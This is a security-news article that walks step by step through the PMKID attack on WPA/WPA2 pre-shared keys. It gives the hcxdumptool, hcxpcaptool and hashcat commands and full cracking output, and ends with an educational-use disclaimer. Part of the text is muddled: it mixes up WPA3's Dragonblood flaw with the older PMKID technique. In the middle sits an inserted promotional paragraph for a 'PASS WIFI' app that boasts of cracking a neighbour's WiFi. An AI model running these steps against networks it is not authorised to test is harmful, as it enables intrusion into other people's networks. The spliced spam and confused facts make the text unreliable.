Monday, October 7, 2024
HomeSecurity HackerHow to Hack WPA/WPA2 PSK Enabled WiFi Password in Your Network

How to Hack WPA/WPA2 PSK Enabled WiFi Password in Your Network

Published on

New Attack method for WiFi hackers discovered to hack WiFi Password secured with WPA/WPA2 in WiFi networks that allow attackers to gain a Pre-shared Key hash that is used to hack Wifi Password used by targeted victims.

WiFi Alliance recently updated the WiFi protocol WPA3 and claimed that impossible to crack since it deployed with a high-level encryption protocol.

But the researcher provides it wrong by exploiting the vulnerability and named it Dragonblood.

- Advertisement - EHA

What is WPA?

Wi-Fi Protected Access (WPA) available since 2003, later security researchers find a severe vulnerability in WPA that let WiFi hackers could easily exploit and take over the WiFi Network.

Later WiFi Alliance fixed the vulnerability and released WPA2 in 2004 which is a common shorthand for the full IEEE 802.11i  which required to certificate from WiFI Alliance to protect the network from WiFi hackers.

Very recently, WPA3 was announced by Wi-Fi Alliance as a replacement for WPA2 after a researcher found the critical vulnerability in WPA2 that allows WiFi hackers to take over the vulnerable network.

This new WiFi Hacker Method is discovered during the attack against the recently released WPA3 security standard which is exceedingly harder to crack since it used Simultaneous Authentication of Equals (SAE), a new key establishment protocol.

The new WP3 Security Standard released by Wi-Fi Alliance provides Next-generation Wi-Fi Security with new capabilities to enhance both personal and enterprise networks and the new WP3 security standard that is a successor of WPA2.

The researcher finds this attack for WiFi Hacker to compromise the WPA/WPA2 password without performing EAPOL 4-way handshake.

According to Steube who is the developer of the Hashcat password cracking tool, The new attack is performed on the RSN IE (Robust Security Network Information Element) of a single EAPOL frame.

Also, this attack works Against all types of  802.11i/p/q/r networks with roaming functions enabled, and it’s unclear how many vendors and how many routers this technique will work.

How Does this WPA/WPA2 Work for WiFi Hacker and WiFi hacking Process?

If you are looking for an app that gives you free access to the Internet then this is it! This app is really the fastest to hack WiFi passwords.I tested it myself and was very pleasantly surprised by how easy it was to crack my neighbor’s WiFi code.

Its installation is very simple, just go to the publisher’s website to download PASS WIFI.

Once it is launched, you will have the wireless network around you with their password displayed on your screen. You will have a lot of fun accessing the Internet network around you using PASS WIFI.

A robust Security Network Information Element (RSN IE) is an optional one in 802.11 management frames and its works in a single EAPOL frame.

Pairwise Master Key ID (PMKID) can be captured from RSN IE whenever the user tries to authenticate with the router.

“Here we can see that the PMKID that has been captured is computed by using HMAC-SHA1 where the key is the PMK and the data part is the concatenation of a fixed string label “PMK Name”, the access point’s MAC address and the station’s MAC address.”

In order to make use of this new attack, as a WiFi Hacker,  you need the following tools:

  • hcxdumptool v4.2.0 or higher
  • hcxtools v4.2.0 or higher
  • hashcat v4.2.0 or higher

WiFi Hacker – Step 1

First Run hcxdumptool to gain the  PMKID from the AP  and dump the file in PCAP format using the following code.

$ ./hcxdumptool -o test.pcapng -i wlp39s0f3u4u5 –enable_status

The output looks like this:

start capturing (stop with ctrl+c)
INTERFACE:……………: wlp39s0f3u4u5
FILTERLIST……………: 0 entries
MAC CLIENT……………: 89acf0e761f4 (client)
MAC ACCESS POINT………: 4604ba734d4e (start NIC)
EAPOL TIMEOUT…………: 20000
DEAUTHENTICATIONINTERVALL: 10 beacons
GIVE UP DEAUTHENTICATIONS: 20 tries
REPLAYCOUNTER…………: 62083
ANONCE……………….: 9ddca61888470946305b27d413a28cf474f19ff64c71667e5c1aee144cd70a69

WiFi Hacker – Step 2

Run the next tool called hcxpcaptool to convert the captured data from pcapng format to a hash format accepted by hashcat using the following code.

WiFi Hacker
$ ./hcxpcaptool -z test.16800 test.pcapng

The content of the written file will look like this and it split into 4 columns.

PMKID * MAC AP * MAC Station * ESSID

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a

Also, Researcher recommends for WiFi Hacker that, While not required it is recommended to use options -E -I and -U with hcxpcaptool. We can use these files to feed hashcat. They typically produce good results.

  • -E retrieve possible passwords from WiFi traffic (additional, this list will include ESSIDs)
  • -I retrieve identities from WiFi-traffic
  • -U retrieve usernames from WiFi-traffic
$ ./hcxpcaptool -E essidlist -I identitylist -U usernamelist -z test.16800 test.pcapng

  Step 3 

Finally, Run hashcat to crack it, we need to use the hash mode PMKID -16800, and we can be used this hash as any other hash type using the following code,

$ ./hashcat -m 16800 test.16800 -a 3 -w 3 ‘?l?l?l?l?l?lt!’

Finally, it cracked the hash  WPA-PMKID-PBKDF2

hashcat (v4.2.0) starting…

OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: GeForce GTX 1080, 2028/8112 MB allocatable, 20MCU
* Device #2: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #3: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU
* Device #4: GeForce GTX 1080, 2029/8119 MB allocatable, 20MCU

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger set to 90c

2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf0e761f4*ed487162465a774bfba60eb603a39f3a:hashcat!

Session……….: hashcat
Status………..: Cracked
Hash.Type……..: WPA-PMKID-PBKDF2
Hash.Target……: 2582a8281bf9d4308d6f5731d0e61c61*4604ba734d4e*89acf…a39f3a
Time.Started…..: Thu Jul 26 12:51:38 2018 (41 secs)
Time.Estimated…: Thu Jul 26 12:52:19 2018 (0 secs)
Guess.Mask…….: ?l?l?l?l?l?lt! [8]
Guess.Queue……: 1/1 (100.00%)
Speed.Dev.#1…..:   408.9 kH/s (103.86ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#2…..:   408.6 kH/s (104.90ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#3…..:   412.9 kH/s (102.50ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#4…..:   410.9 kH/s (104.66ms) @ Accel:64 Loops:128 Thr:1024 Vec:1
Speed.Dev.#*…..:  1641.3 kH/s
Recovered……..: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress………: 66846720/308915776 (21.64%)
Rejected………: 0/66846720 (0.00%)
Restore.Point….: 0/11881376 (0.00%)
Candidates.#1….: hariert! -> hhzkzet!
Candidates.#2….: hdtivst! -> hzxkbnt!
Candidates.#3….: gnxpwet! -> gwqivst!
Candidates.#4….: gxhcddt! -> grjmrut!
HWMon.Dev.#1…..: Temp: 81c Fan: 54% Util: 75% Core:1771MHz Mem:4513MHz Bus:1
HWMon.Dev.#2…..: Temp: 81c Fan: 54% Util:100% Core:1607MHz Mem:4513MHz Bus:1
HWMon.Dev.#3…..: Temp: 81c Fan: 54% Util: 94% Core:1683MHz Mem:4513MHz Bus:1
HWMon.Dev.#4…..: Temp: 81c Fan: 54% Util: 93% Core:1620MHz Mem:4513MHz Bus:1

Started: Thu Jul 26 12:51:30 2018
Stopped: Thu Jul 26 12:52:21 2018

When we look at previously available WiFi Hacking attacks for WiFi Hackers, we need to sit back and wait until the target user logs in later we can crack the key by capturing the four-way handshake.

To get access to the PMKID, this new attack has to attempt to authenticate to the wireless network later we can easily hack the WiFi password and the crucial pre-shared on behalf of the WiFi Hacker.

Also, this method is much easier to access the hash that contains the pre-shared key, and later moment the hash will be cracked; also this attack is a little complex based on the complexity of the password.

Conclusion

Recently WiFi Alliance released a highly secured protocol WPA3 for WiFi Networks but WPA3 was Hacked again by the team of security researchers due to a security flaw in the protocol. Using the above method now WiFi Hackers can hack the WiFi Password.

This article is completely for educational purposes, please do not attempt to test any WiFi network without permission.

You can follow us on LinkedinTwitter, and Facebook for daily Cybersecurity updates also you can take the Best Cybersecurity course online to keep yourself updated

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Chinese Group Hacked US Court Wiretap Systems

Chinese hackers have infiltrated the networks of major U.S. broadband providers, gaining access to...

19.6K+ Public Zimbra Installations Vulnerable to Code Execution Attacks – CVE-2024-45519

A critical vulnerability in Zimbra's postjournal service, identified as CVE-2024-45519, has left over 19,600...

Prince Ransomware Hits UK and US via Royal Mail Phishing Scam

A new ransomware campaign targeting individuals and organizations in the UK and the US...

Microsoft, DOJ Dismantle Domains Used by Russian FSB-Linked Hacking Group

Microsoft and the U.S. Department of Justice (DOJ) have successfully dismantled a network of...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

Top 10 Best Penetration Testing Companies & Services in 2024

Penetration Testing Companies are pillars of information security; nothing is more important than ensuring...

Best SIEM Tools List For SOC Team – 2024

The Best SIEM tools for you will depend on your specific requirements, budget, and...

Europe’s Most Wanted Teenage Hacker Arrested

Julius “Zeekill” Kivimäki, once Europe's most wanted teenage hacker, has been arrested.Kivimäki, known for his involvement with the notorious Lizard Squad,...